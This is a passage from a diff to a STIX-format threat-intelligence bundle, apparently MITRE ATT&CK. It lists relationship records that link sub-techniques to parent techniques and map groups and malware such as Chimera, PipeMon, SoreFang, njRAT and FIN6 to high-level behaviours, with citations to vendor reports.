+ "type": "relationship", + "modified": "2020-10-02T02:11:32.105Z", + "created": "2020-10-02T02:11:32.105Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161", + "target_ref": "attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4", + "relationship_type": "subtechnique-of", + "id": "relationship--f1b32781-5cc4-40b3-a9b9-af069657665a", + "type": "relationship", + "modified": "2020-10-02T14:55:43.968Z", + "created": "2020-10-02T14:55:43.967Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262", + "target_ref": "attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4", + "relationship_type": "subtechnique-of", + "id": "relationship--ca38e574-09b1-4fc3-beb1-2af04189c05d", + "type": "relationship", + "modified": "2020-10-02T14:56:25.034Z", + "created": "2020-10-02T14:56:25.034Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156", + "target_ref": "attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4", + "relationship_type": "subtechnique-of", + "id": "relationship--0ea6c4e4-fedd-4fd9-a5fc-c07e3fb0f2a5", + "type": "relationship", + "modified": "2020-10-02T14:57:16.081Z", + "created": "2020-10-02T14:57:16.081Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--e3b168bd-fcd7-439e-9382-2e6c2f63514d", + "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", + "relationship_type": "subtechnique-of", + "id": "relationship--2c4c8178-d95a-4e5c-a9e0-e5fd52f5621b", + "type": "relationship", + "modified": "2020-10-02T15:46:24.765Z", + "created": "2020-10-02T15:46:24.764Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea", + "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", + "relationship_type": "subtechnique-of", + "id": "relationship--505cb238-11ca-4409-b008-6aa808d2ec2d", + "type": "relationship", + "modified": "2020-10-02T15:47:10.227Z", + "created": "2020-10-02T15:47:10.227Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--36aa137f-5166-41f8-b2f0-a4cfa1b4133e", + "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", + "relationship_type": "subtechnique-of", + "id": "relationship--86c68d0b-23db-4f0a-9d06-a3832ec4e8ed", + "type": "relationship", + "modified": "2020-10-02T15:47:59.629Z", + "created": "2020-10-02T15:47:59.629Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--34ab90a3-05f6-4259-8f21-621081fdaba5", + "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", + "relationship_type": "subtechnique-of", + "id": "relationship--8ab253ed-9bf8-4e0d-b367-f9d5349a7cfc", + "type": "relationship", + "modified": "2020-10-02T15:49:03.913Z", + "created": "2020-10-02T15:49:03.913Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3", + "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", + "relationship_type": "subtechnique-of", + "id": "relationship--53cfa0ee-9802-4abb-8be5-7411095dbe8f", + "type": "relationship", + "modified": "2020-10-02T15:59:11.783Z", + "created": "2020-10-02T15:59:11.783Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--6c2957f9-502a-478c-b1dd-d626c0659413", + "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", + "relationship_type": "subtechnique-of", + "id": "relationship--f655e6a0-431c-4996-859d-2e1952f26d2e", + "type": "relationship", + "modified": "2020-10-02T16:01:35.489Z", + "created": "2020-10-02T16:01:35.489Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--6ee2dc99-91ad-4534-a7d8-a649358c331f", + "target_ref": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", + "relationship_type": "subtechnique-of", + "id": "relationship--5a742223-f67f-447f-af86-5ed546f8476b", + "type": "relationship", + "modified": "2020-10-02T16:27:55.863Z", + "created": "2020-10-02T16:27:55.863Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--ed730f20-0e44-48b9-85f8-0e2adeb76867", + "target_ref": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", + "relationship_type": "subtechnique-of", + "id": "relationship--8968bf11-5ba9-4012-a277-4a40ed796fbf", + "type": "relationship", + "modified": "2020-10-02T16:32:33.229Z", + "created": "2020-10-02T16:32:33.229Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--2339cf19-8f1e-48f7-8a91-0262ba547b6f", + "target_ref": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", + "relationship_type": "subtechnique-of", + "id": "relationship--f2ce3446-c0ca-499c-bc7f-1930ce148285", + "type": "relationship", + "modified": "2020-10-02T16:34:32.537Z", + "created": "2020-10-02T16:34:32.537Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--cc723aff-ec88-40e3-a224-5af9fd983cc4", + "target_ref": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", + "relationship_type": "subtechnique-of", + "id": "relationship--9acea9fd-5c35-4956-b048-4e22dad5a044", + "type": "relationship", + "modified": "2020-10-02T16:37:30.084Z", + "created": "2020-10-02T16:37:30.083Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--24286c33-d4a4-4419-85c2-1d094a896c26", + "target_ref": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", + "relationship_type": "subtechnique-of", + "id": "relationship--82f35485-e0de-4eb5-b643-e5608bfdcd94", + "type": "relationship", + "modified": "2020-10-02T16:40:47.550Z", + "created": "2020-10-02T16:40:47.550Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884", + "target_ref": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", + "relationship_type": "subtechnique-of", + "id": "relationship--f630f321-d227-414b-9272-fe19268779e0", + "type": "relationship", + "modified": "2020-10-02T16:42:42.607Z", + "created": "2020-10-02T16:42:42.607Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--b85f6ce5-81e8-4f36-aff2-3df9d02a9c9d", + "target_ref": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", + "relationship_type": "subtechnique-of", + "id": "relationship--997669d5-29e4-4a89-81b8-9aa84ebce527", + "type": "relationship", + "modified": "2020-10-02T16:46:42.674Z", + "created": "2020-10-02T16:46:42.674Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c", + "target_ref": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", + "relationship_type": "subtechnique-of", + "id": "relationship--f8aaf144-17a2-41b5-b723-a80cb43a8c75", + "type": "relationship", + "modified": "2020-10-02T16:47:16.805Z", + "created": "2020-10-02T16:47:16.805Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--bbe5b322-e2af-4a5e-9625-a4e62bf84ed3", + "target_ref": "attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365", + "relationship_type": "subtechnique-of", + "id": "relationship--ef1787e0-add4-4490-9777-33462acf9325", + "type": "relationship", + "modified": "2020-10-02T16:49:31.371Z", + "created": "2020-10-02T16:49:31.370Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968", + "target_ref": "attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365", + "relationship_type": "subtechnique-of", + "id": "relationship--3be9d897-5a20-4e2f-8b73-2a69256925b0", + "type": "relationship", + "modified": "2020-10-02T16:50:12.902Z", + "created": "2020-10-02T16:50:12.902Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120", + "target_ref": "attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b", + "relationship_type": "subtechnique-of", + "id": "relationship--9feede0a-38c3-4aa7-8416-c2b0d0d67f83", + "type": "relationship", + "modified": "2020-10-02T16:54:23.287Z", + "created": "2020-10-02T16:54:23.287Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4", + "target_ref": "attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b", + "relationship_type": "subtechnique-of", + "id": "relationship--e3fe170d-55c7-4f98-9d39-6ee28403ce87", + "type": "relationship", + "modified": "2020-10-02T16:55:16.136Z", + "created": "2020-10-02T16:55:16.136Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f", + "target_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", + "relationship_type": "subtechnique-of", + "id": "relationship--e7339f46-a3f5-47c8-9850-313797cd6fb2", + "type": "relationship", + "modified": "2020-10-02T16:56:49.838Z", + "created": "2020-10-02T16:56:49.838Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532", + "target_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", + "relationship_type": "subtechnique-of", + "id": "relationship--8074bdff-7555-478e-a45e-bb042e5719ab", + "type": "relationship", + "modified": "2020-10-02T16:57:45.197Z", + "created": "2020-10-02T16:57:45.197Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca", + "target_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", + "relationship_type": "subtechnique-of", + "id": "relationship--3fe5844e-d197-4636-a4c4-b89b368c2597", + "type": "relationship", + "modified": "2020-10-02T16:58:58.847Z", + "created": "2020-10-02T16:58:58.847Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--91177e6d-b616-4a03-ba4b-f3b32f7dda75", + "target_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", + "relationship_type": "subtechnique-of", + "id": "relationship--bd29b3ec-5dab-49fe-90ec-37f4c0a3f442", + "type": "relationship", + "modified": "2020-10-02T16:59:56.765Z", + "created": "2020-10-02T16:59:56.765Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--ec4be82f-940c-4dcb-87fe-2bbdd17c692f", + "target_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", + "relationship_type": "subtechnique-of", + "id": "relationship--5fe30af6-e590-4285-9766-af390cdfba0f", + "type": "relationship", + "modified": "2020-10-02T17:00:44.709Z", + "created": "2020-10-02T17:00:44.709Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--51e54974-a541-4fb6-a61b-0518e4c6de41", + "target_ref": "attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4", + "relationship_type": "subtechnique-of", + "id": "relationship--09c76211-6357-4dc3-b4f6-361007e21af9", + "type": "relationship", + "modified": "2020-10-02T17:03:46.050Z", + "created": "2020-10-02T17:03:46.050Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "[Chimera](https://attack.mitre.org/groups/G0114) has used Windows admin shares to move laterally.(Citation: Cycraft Chimera April 2020)", + "relationship_type": "uses", + "id": "relationship--62a2b674-1eb3-4a9f-ac4f-2766c077eb58", + "type": "relationship", + "modified": "2020-10-05T20:59:58.002Z", + "created": "2020-10-02T17:04:58.162Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f", + "target_ref": "attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4", + "relationship_type": "subtechnique-of", + "id": "relationship--2bbcc7da-f535-4974-bc08-4edb5a235828", + "type": "relationship", + "modified": "2020-10-02T17:05:43.684Z", + "created": "2020-10-02T17:05:43.684Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--f870408c-b1cd-49c7-a5c7-0ef0fc496cc6", + "target_ref": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", + "relationship_type": "subtechnique-of", + "id": "relationship--a299b456-78d0-4cf2-accc-4dfd7b5cd74d", + "type": "relationship", + "modified": "2020-10-02T17:08:07.889Z", + "created": "2020-10-02T17:08:07.889Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc", + "target_ref": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", + "relationship_type": "subtechnique-of", + "id": "relationship--a2dc6f64-0980-4668-957d-a09538074898", + "type": "relationship", + "modified": "2020-10-02T17:08:57.537Z", + "created": "2020-10-02T17:08:57.537Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--2d3f5b3c-54ca-4f4d-bb1f-849346d31230", + "target_ref": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", + "relationship_type": "subtechnique-of", + "id": "relationship--d12eb6a1-bb15-4d95-8390-667cda87923e", + "type": "relationship", + "modified": "2020-10-02T17:09:50.903Z", + "created": "2020-10-02T17:09:50.903Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795", + "external_references": [ + { + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "source_name": "FireEye TRITON 2019" + } + ], + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used Virtual Private Server (VPS) infrastructure.(Citation: FireEye TRITON 2019)", + "relationship_type": "uses", + "id": "relationship--c024f146-ef3e-4220-8658-b5ad312e1df1", + "type": "relationship", + "modified": "2020-10-04T23:31:37.194Z", + "created": "2020-10-04T23:31:37.194Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad", + "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "relationship_type": "subtechnique-of", + "id": "relationship--6c917468-e8f1-48d1-b7e5-aab34c5ff497", + "type": "relationship", + "modified": "2020-10-05T13:24:49.882Z", + "created": "2020-10-05T13:24:49.882Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--5f1d4579-4e8f-48e7-860e-2da773ae432e", + "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", + "external_references": [ + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." + } + ], + "description": "[Anchor](https://attack.mitre.org/software/S0504) can establish persistence by creating a service.(Citation: Cyberreason Anchor December 2019)\t", + "relationship_type": "uses", + "id": "relationship--90f5f474-eed1-4145-be80-155bc5783680", + "type": "relationship", + "modified": "2020-10-05T17:54:54.127Z", + "created": "2020-10-05T17:54:54.127Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "target_ref": "attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad", + "external_references": [ + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "description": "The [PipeMon](https://attack.mitre.org/software/S0501) installer has modified the Registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Print Processors to install [PipeMon](https://attack.mitre.org/software/S0501) as a Print Processor.(Citation: ESET PipeMon May 2020)", + "relationship_type": "uses", + "id": "relationship--74bc9883-6d48-4e68-bc61-1fea450e89e7", + "type": "relationship", + "modified": "2020-10-09T16:02:39.440Z", + "created": "2020-10-05T19:54:22.903Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317", + "target_ref": "attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad", + "relationship_type": "mitigates", + "description": "Limit user accounts that can load or unload device drivers by disabling SeLoadDriverPrivilege.", + "id": "relationship--ce95c6cf-0dc7-4f66-a329-7fbd833aa57e", + "type": "relationship", + "modified": "2020-10-09T16:05:36.461Z", + "created": "2020-10-05T20:17:04.419Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--959f3b19-2dc8-48d5-8942-c66813a5101a", + "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "external_references": [ + { + "source_name": "CISA WellMail July 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c", + "description": "CISA. (2020, July 16). MAR-10296782-3.v1 \u2013 WELLMAIL. Retrieved September 29, 2020." + } + ], + "description": "[WellMail](https://attack.mitre.org/software/S0515) can use TCP for C2 communications.(Citation: CISA WellMail July 2020)", + "relationship_type": "uses", + "id": "relationship--5be3684a-cb63-4328-bba0-22f14298b920", + "type": "relationship", + "modified": "2020-10-06T16:01:27.500Z", + "created": "2020-10-06T16:01:27.500Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "target_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", + "external_references": [ + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "description": "[SoreFang](https://attack.mitre.org/software/S0516) can enumerate domain accounts via net.exe user /domain.(Citation: CISA SoreFang July 2016)", + "relationship_type": "uses", + "id": "relationship--0cf8d5da-a127-4b48-bbf9-e5a0376033b4", + "type": "relationship", + "modified": "2020-10-06T16:10:42.495Z", + "created": "2020-10-06T16:10:42.495Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc", + "target_ref": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "external_references": [ + { + "source_name": "Trustwave Pillowmint June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020." + } + ], + "description": "(Citation: Trustwave Pillowmint June 2020)", + "relationship_type": "uses", + "id": "relationship--95d8ef7d-47b2-438d-921c-902dbb3467bb", + "type": "relationship", + "modified": "2020-10-07T15:35:14.637Z", + "created": "2020-10-07T15:35:14.636Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945", + "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "external_references": [ + { + "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/", + "source_name": "Trend Micro njRAT 2018" + } + ], + "description": "[njRAT](https://attack.mitre.org/software/S0385) has used the ShellExecute() function within a script.(Citation: Trend Micro njRAT 2018)", + "relationship_type": "uses", + "id": "relationship--48879c97-651c-4426-9093-bd8c4939fc19", + "type": "relationship", + "modified": "2020-10-08T18:47:57.442Z", + "created": "2020-10-08T18:47:57.442Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "external_references": [ + { + "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/", + "source_name": "Trend Micro njRAT 2018" + } + ], + "description": "[njRAT](https://attack.mitre.org/software/S0385) has used HTTP for C2 communications.(Citation: Trend Micro njRAT 2018)", + "relationship_type": "uses", + "id": "relationship--a0188e1f-8048-4ade-a1f5-9a56d2fcc2b1", + "type": "relationship", + "modified": "2020-10-08T18:47:57.462Z", + "created": "2020-10-08T18:47:57.462Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "description": "Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.", + "url": "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf", + "source_name": "Visa FIN6 Feb 2019" + } + ], + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has used encoded PowerShell commands.(Citation: Visa FIN6 Feb 2019)", + "relationship_type": "uses", + "id": "relationship--2c8ae921-219f-42ab-a4a4-5736ef0f8bf8", + "type": "relationship", + "modified": "2020-10-08T20:15:21.341Z", + "created": "2020-10-08T20:15:21.341Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "description": "FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.", + "source_name": "FireEye FIN6 